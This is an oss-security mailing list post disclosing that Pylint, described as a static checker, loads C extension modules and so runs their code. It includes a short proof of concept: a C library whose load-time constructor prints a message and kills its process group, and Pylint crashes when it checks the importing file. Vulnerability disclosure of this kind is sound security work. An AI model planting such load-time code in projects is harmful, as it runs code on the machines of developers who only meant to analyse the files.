oss-security - Pylint checks not as static as one would think

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [thread-next>] [day] [month] [year] [list]

Message-ID: <20140929123221.GA4178@jwilk.net>
Date: Mon, 29 Sep 2014 14:32:21 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Pylint checks not as static as one would think

Pylint[0] is advertised as "a static code checker, meaning it can 
analyse your code without actually running it"[1] and that it "does 
not import live modules"[1].

This is, unfortunately, far from reality. Here's a PoC:

$ cat moo.py
from _moo import *

$ cat moo.c
#include <stdio.h>
#include <signal.h>
void __attribute__((constructor)) moo() {
	printf("moo!\n");
	kill(0, SIGSEGV);
}

$ gcc -Wall -shared -fPIC moo.c -o _moo.so

$ pylint moo.py
No config file found, using default configuration
moo!
Segmentation fault

My understanding is that upstream Pylint maintainers consider this 
behavior intentional[2]. But even then, I think it's a serious 
documentation flaw.

Should a CVE ID be assigned to this bug? If yes, it should be a 
CVE-2010-XXXX.

[0] http://www.pylint.org/
[1] http://docs.pylint.org/faq.html#about-pylint
[2] https://bugs.debian.org/591676#28

-- 
Jakub Wilk

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.